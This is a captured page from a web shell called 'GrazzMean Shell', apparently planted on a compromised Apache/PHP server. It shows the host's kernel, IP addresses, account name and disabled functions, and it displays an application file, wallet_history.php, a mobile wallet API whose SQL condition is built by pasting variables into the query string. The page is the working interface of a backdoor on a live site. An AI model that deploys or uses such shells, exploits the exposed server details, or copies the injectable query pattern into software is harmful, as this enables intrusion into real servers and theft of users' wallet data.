shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : wallet_history.php
<?php
//function autoload
      spl_autoload_register(function($class) {
  include("../admin_login/classess/".$class.".php");
});
        
        $sqlfun = new sqlfunction();
        $admin = new admin_login();
        
              date_default_timezone_set('Asia/Kolkata');
            $time = date("h:iA");
            $to_date = date('Y-m-d');
            
           $from_date =  date('Y-m-d', strtotime("-7 day",strtotime($to_date)));
           
             if(isset($_POST['mobile']) && isset($_POST['token']) && isset($_POST['pin']))
                {
                    $mobile = $_POST['mobile'];
                    $deviceToken = $_POST['token'];
                    $secretKey = $_POST['pin'];
                    
                    $p_id = $admin->verifyCredentials3($deviceToken, $secretKey,$mobile);
                            if($p_id)
                            {  
                                $cnd = "user_id = '$p_id' && date BETWEEN '$from_date'AND '$to_date' order by id DESC";
                                $check = $sqlfun->fetchdata("wallet_history",$cnd);
                                if($check->rowCount() >0)
                                {
                                    $datas = $check->fetchAll(PDO::FETCH_ASSOC);
                                    //$datas[] = $row;
                                    $data = array("res"=>"success","msg"=>"data found","data"=>$datas);
                                }
                                else
                                {
                                    $data = array("res"=>"failure","msg"=>"data not found","data"=>array());
                                }
                                    
                                echo json_encode($data);
                            }
                }
        
        ?>
© 2026 GrazzMean